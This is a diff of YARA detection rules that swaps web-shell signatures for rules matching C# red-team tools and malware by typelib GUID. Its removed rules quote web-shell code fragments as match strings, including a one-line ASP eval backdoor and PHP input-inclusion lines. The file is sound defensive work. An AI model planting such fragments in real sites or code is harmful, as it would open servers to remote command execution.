+		reference = "https://github.com/awillard1/Pen-Test-Tools"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2016-L2040"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "de0a58f7d1e200d0b2c801a94ebce330"
-		logic_hash = "a4a6205ace49778ddc421b0f0e65c576e2ffe40ce2ab84debb939d5324420405"
-		score = 70
+		logic_hash = "dc124d65fd724a2e73c708925f44fd87dcd067c121f2875a15ed790c84405899"
+		score = 50
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "<%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thi"
+		$typelibguid0lo = "922e7fdc-33bf-48de-bc26-a81f85462115" ascii wide
+		$typelibguid1lo = "ad5205dd-174d-4332-96d9-98b076d6fd82" ascii wide
+		$typelibguid2lo = "b67e7550-f00e-48b3-ab9b-4332b1254a86" ascii wide
+		$typelibguid3lo = "5e95120e-b002-4495-90a1-cd3aab2a24dd" ascii wide
+		$typelibguid4lo = "295017f2-dc31-4a87-863d-0b9956c2b55a" ascii wide
+		$typelibguid5lo = "abbaa2f7-1452-43a6-b98e-10b2c8c2ba46" ascii wide
+		$typelibguid6lo = "a4043d4c-167b-4326-8be4-018089650382" ascii wide
+		$typelibguid7lo = "51abfd75-b179-496e-86db-62ee2a8de90d" ascii wide
+		$typelibguid8lo = "a06da7f8-f87e-4065-81d8-abc33cb547f8" ascii wide
+		$typelibguid9lo = "ee510712-0413-49a1-b08b-1f0b0b33d6ef" ascii wide
+		$typelibguid10lo = "9780da65-7e25-412e-9aa1-f77d828819d6" ascii wide
+		$typelibguid11lo = "7913fe95-3ad5-41f5-bf7f-e28f080724fe" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Web
+rule SIGNATURE_BASE_HKTL_NET_GUID_The_Collection : FILE
 {
 	meta:
-		description = "Web Shell - file web.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L786-L799"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "4ae78576-ab75-5679-9a29-4d9a1ff03f15"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/Tlgyt/The-Collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2042-L2059"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4bc11e28f5dccd0c45a37f2b541b2e98"
-		logic_hash = "ed0ace0ba5f8a9e763353c42e3e3a39da10596e8517aad33e5c5080b44e4d61a"
-		score = 70
+		logic_hash = "d8e28d972aaf44caff35bf982788a6e9b69d0acce4b11c8cfa00c65466412305"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%String t=request."
+		$typelibguid0lo = "579159ff-3a3d-46a7-b069-91204feb21cd" ascii wide
+		$typelibguid1lo = "5b7dd9be-c8c3-4c4f-a353-fefb89baa7b3" ascii wide
+		$typelibguid2lo = "43edcb1f-3098-4a23-a7f2-895d927bc661" ascii wide
+		$typelibguid3lo = "5f19919d-cd51-4e77-973f-875678360a6f" ascii wide
+		$typelibguid4lo = "17fbc926-e17e-4034-ba1b-fb2eb57f5dd3" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Mysqlwebsh
+rule SIGNATURE_BASE_HKTL_NET_GUID_Change_Lockscreen : FILE
 {
 	meta:
-		description = "Web Shell - file mysqlwebsh.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L800-L813"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "a817c6e8-95f9-56c6-97b8-4be06658629f"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/nccgroup/Change-Lockscreen"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2061-L2074"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "babfa76d11943a22484b3837f105fada"
-		logic_hash = "365d19c086b3bbb98cbe1e1ed1e7522ce98dc2614a39c747717c277cebef33d2"
-		score = 70
+		logic_hash = "6b3cd265c6ccdae529a52c3609610f0e633f0112180afd63a5d9892e78d12ef1"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = " <TR><TD bgcolor=\"<? echo (!$CONNECT && $action == \"chparam\")?\"#660000\":\"#"
+		$typelibguid0lo = "78642ab3-eaa6-4e9c-a934-e7b0638bc1cc" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jspshell
+rule SIGNATURE_BASE_HKTL_NET_GUID_LOLBITS : FILE
 {
 	meta:
-		description = "Web Shell - file jspShell.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L814-L828"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "66454ac0-742b-51a3-ac45-1ac9606e8b89"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/Kudaes/LOLBITS"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2076-L2089"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0d5b5a17552254be6c1c8f1eb3a5fdc1"
-		logic_hash = "058ddd64b142cada7144b9befa81ada314b72e6f23524d98efcb10136c23ed33"
-		score = 70
+		logic_hash = "fa5978a49940cef63308ae228607eff22d19ea05373b2c4a3a293074af422b20"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<input type=\"checkbox\" name=\"autoUpdate\" value=\"AutoUpdate\" on"
-		$s1 = "onblur=\"document.shell.autoUpdate.checked= this.oldValue;"
+		$typelibguid0lo = "29d09aa4-ea0c-47c2-973c-1d768087d527" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Dx_Dx
+rule SIGNATURE_BASE_HKTL_NET_GUID_Keylogger : FILE
 {
 	meta:
-		description = "Web Shell - file Dx.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L829-L843"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0576756e-26d5-5165-b621-917126a75a38"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/BlackVikingPro/Keylogger"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2091-L2104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9cfe372d49fe8bf2fac8e1c534153d9b"
-		logic_hash = "c2eddf58b25caff79460ab9a87ac0573d483866a87c1b1ec0984afce2c22b29f"
-		score = 70
+		logic_hash = "490fb06375b32c70041754e8855cc1d26b76531d24a58bb0b719a998fdb809d6"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
-		$s9 = "class=linelisting><nobr>POST (php eval)</td><"
+		$typelibguid0lo = "7afbc9bf-32d9-460f-8a30-35e30aa15879" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_Ntdaddy
+rule SIGNATURE_BASE_HKTL_NET_GUID_CVE_2020_1337 : FILE
 {
 	meta:
-		description = "Web Shell - file ntdaddy.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L844-L858"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "4b79867d-761c-5aa8-bf8a-60caa50d8aa6"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/neofito/CVE-2020-1337"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2106-L2119"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c5e6baa5d140f73b4e16a6cfde671c68"
-		logic_hash = "7237eb7233c6affcc1f67a764f704b7d7e1d13f71c64893286c6c99318cc7c3e"
-		score = 70
+		logic_hash = "05d557a3592845030880c3b87d8134565c2858db89218e1c38edbb025b945d72"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s9 = "if  FP  =  \"RefreshFolder\"  or  "
-		$s10 = "request.form(\"cmdOption\")=\"DeleteFolder\"  "
+		$typelibguid0lo = "d9c2e3c1-e9cc-42b0-a67c-b6e1a4f962cc" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Mysql_Web_Interface_Version_0_8
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharplogger : FILE
 {
 	meta:
-		description = "Web Shell - file MySQL Web Interface Version 0.8.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L859-L872"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5cce395b-4f6f-5015-b45e-7eb79853296a"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/djhohnstein/SharpLogger"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2121-L2134"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "36d4f34d0a22080f47bb1cb94107c60f"
-		logic_hash = "680d4368804ad21e46dbe400563beca3ef724711b5432dccce1276ecadc04f2c"
-		score = 70
+		logic_hash = "9f63dc6bf41b6a062e80b6726c86bbeb7db68e319a78d1bd0187eef234a1c090"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>"
+		$typelibguid0lo = "36e00152-e073-4da8-aa0c-375b6dd680c4" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Elmaliseker_2
+rule SIGNATURE_BASE_HKTL_NET_GUID_Asyncrat_C_Sharp : FILE
 {
 	meta:
-		description = "Web Shell - file elmaliseker.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L873-L887"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "858a079d-71e8-516e-a2a9-f0969edc758b"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2136-L2159"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b32d1730d23a660fd6aa8e60c3dc549f"
-		logic_hash = "ca300cd142b3c8b820d3b5f5a56eeb834d9acb1d85916b932bd67fb4a25f4ed0"
-		score = 70
+		logic_hash = "ac6319ecfbfc2ddb096b8674a9b494d9460181ebaa2b32ee337d46f6dd33f21d"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<td<%if (FSO.GetExtensionName(path & \"\\\" & oFile.Name)=\"lnk\") or (FSO.GetEx"
-		$s6 = "<input type=button value=Save onclick=\"EditorCommand('Save')\"> <input type=but"
+		$typelibguid0lo = "619b7612-dfea-442a-a927-d997f99c497b" ascii wide
+		$typelibguid1lo = "424b81be-2fac-419f-b4bc-00ccbe38491f" ascii wide
+		$typelibguid2lo = "37e20baf-3577-4cd9-bb39-18675854e255" ascii wide
+		$typelibguid3lo = "dafe686a-461b-402b-bbd7-2a2f4c87c773" ascii wide
+		$typelibguid4lo = "ee03faa9-c9e8-4766-bd4e-5cd54c7f13d3" ascii wide
+		$typelibguid5lo = "8bfc8ed2-71cc-49dc-9020-2c8199bc27b6" ascii wide
+		$typelibguid6lo = "d640c36b-2c66-449b-a145-eb98322a67c8" ascii wide
+		$typelibguid7lo = "8de42da3-be99-4e7e-a3d2-3f65e7c1abce" ascii wide
+		$typelibguid8lo = "bee88186-769a-452c-9dd9-d0e0815d92bf" ascii wide
+		$typelibguid9lo = "9042b543-13d1-42b3-a5b6-5cc9ad55e150" ascii wide
+		$typelibguid10lo = "6aa4e392-aaaf-4408-b550-85863dd4baaf" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_ASP_Remexp
+rule SIGNATURE_BASE_HKTL_NET_GUID_Darkfender : FILE
 {
 	meta:
-		description = "Web Shell - file RemExp.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L888-L902"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0aea5e05-7788-5581-8bcc-d2e75a291dd9"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/0xyg3n/DarkFender"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2161-L2174"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "aa1d8491f4e2894dbdb91eec1abc2244"
-		logic_hash = "7a3b35c4a16f26167180cea81f67de101edabb9b35479f7e5acae7f3fe07f304"
-		score = 70
+		logic_hash = "2afa4ff5719cb5b3a53b45a880e08e2cac6df8bb1ff053ee290ad6b025f9a6b5"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Reques"
-		$s1 = "Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal"
+		$typelibguid0lo = "12fdf7ce-4a7c-41b6-9b32-766ddd299beb" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_List1
+rule SIGNATURE_BASE_HKTL_NET_GUID_Minerdropper : FILE
 {
 	meta:
-		description = "Web Shell - file list1.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L903-L917"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "607f72df-b0c1-53df-bf2c-592f55cbfcb7"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/DylanAlloy/MinerDropper"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2194-L2208"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8d9e5afa77303c9c01ff34ea4e7f6ca6"
-		logic_hash = "61ecafe477d98c5eb6887a9ff50960fc28b84512d09a36c02588159b08b395a4"
-		score = 70
+		logic_hash = "1a604745a0d95c54be0d1b183486aad0751aee825574500fbff6380571565a18"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "case 's':ConnectionDBM(out,encodeChange(request.getParameter(\"drive"
-		$s9 = "return \"<a href=\\\"javascript:delFile('\"+folderReplace(file)+\"')\\\""
+		$typelibguid0lo = "46a7af83-1da7-40b2-9d86-6fd6223f6791" ascii wide
+		$typelibguid1lo = "8433a693-f39d-451b-955b-31c3e7fa6825" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Phpkit_1_0_Odd
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpdomainspray : FILE
 {
 	meta:
-		description = "Web Shell - file odd.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L918-L933"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "cffd3350-4a86-5035-ab15-adbc3ac2a0e9"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/HunnicCyber/SharpDomainSpray"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2210-L2223"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "594d1b1311bbef38a0eb3d6cbb1ab538"
-		logic_hash = "bf99d6a71b9ef72574d928a09f3a479f2f819287d78c9a5435e45752e76a59bf"
-		score = 70
+		logic_hash = "da8a964691758e8179199b5725b0811a5b37de964f6a5fa01d6adac286bc544a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "include('php://input');" fullword
-		$s1 = "// No eval() calls, no system() calls, nothing normally seen as malicious." fullword
-		$s2 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword
+		$typelibguid0lo = "76ffa92b-429b-4865-970d-4e7678ac34ea" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_123
+rule SIGNATURE_BASE_HKTL_NET_GUID_Ispykeylogger : FILE
 {
 	meta:
-		description = "Web Shell - file 123.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L934-L949"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8607de67-b472-5afc-b2b9-cc758b5ec474"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/mwsrc/iSpyKeylogger"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2225-L2241"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c691f53e849676cac68a38d692467641"
-		logic_hash = "48925d3a302bf09ecb3f031301ca8afc722c7ef53b87efa27a3c4b58ee15217d"
-		score = 70
+		logic_hash = "0c0b0a8d53efc5e922f73eec7550e6927f19aaef950921fde95b7bd651adeec7"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7"
-		$s3 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
-		$s9 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">    " fullword
+		$typelibguid0lo = "ccc0a386-c4ce-42ef-aaea-b2af7eff4ad8" ascii wide
+		$typelibguid1lo = "816b8b90-2975-46d3-aac9-3c45b26437fa" ascii wide
+		$typelibguid2lo = "279b5533-d3ac-438f-ba89-3fe9de2da263" ascii wide
+		$typelibguid3lo = "88d3dc02-2853-4bf0-b6dc-ad31f5135d26" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_1
+rule SIGNATURE_BASE_HKTL_NET_GUID_Solarflare : FILE
 {
 	meta:
-		description = "Web Shell - file 1.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L950-L964"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3645e14c-6025-59fa-a5a2-d8dacba8cd94"
+		date = "2020-12-15"
+		modified = "2025-08-15"
+		reference = "https://github.com/mubix/solarflare"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2243-L2256"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8991148adf5de3b8322ec5d78cb01bdb"
-		logic_hash = "9cae40c8fc3966942a8fc3ee0f5d07081ba2d1c1c3156144488ba64015d6838b"
-		score = 70
+		logic_hash = "9968c4f65672e98ec1ced26e2344e9b12141e3ea7e58be650d077089c9f6bd1c"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "!22222222222222222222222222222222222222222222222222" fullword
-		$s8 = "<%eval request(\"pass\")%>" fullword
+		$typelibguid0lo = "ca60e49e-eee9-409b-8d1a-d19f1d27b7e4" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_ASP_Tool
-{
-	meta:
-		description = "Web Shell - file tool.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L965-L980"
+rule SIGNATURE_BASE_HKTL_NET_GUID_Snaffler : FILE
+{
+	meta:
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d4b9a8c5-e0d9-5c85-af81-05f6e0f52bff"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/SnaffCon/Snaffler"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2258-L2272"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4ab68d38527d5834e9c1ff64407b34fb"
-		logic_hash = "62ba39bac09cb403a47678cd38c519642cc3c20f43c470b828ec448c42e9bb73"
-		score = 70
+		logic_hash = "a99f8012e45bbc7b689c49d2f6b5e86918b3984ce211fc4b459b6297d75c233a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Response.Write \"<FORM action=\"\"\" & Request.ServerVariables(\"URL\") & \"\"\""
-		$s3 = "Response.Write \"<tr><td><font face='arial' size='2'><b>&lt;DIR&gt; <a href='\" "
-		$s9 = "Response.Write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javas"
+		$typelibguid0lo = "2aa060b4-de88-4d2a-a26a-760c1cefec3e" ascii wide
+		$typelibguid1lo = "b118802d-2e46-4e41-aac7-9ee890268f8b" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Cmd_Win32
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpshares : FILE
 {
 	meta:
-		description = "Web Shell - file cmd_win32.jsp"
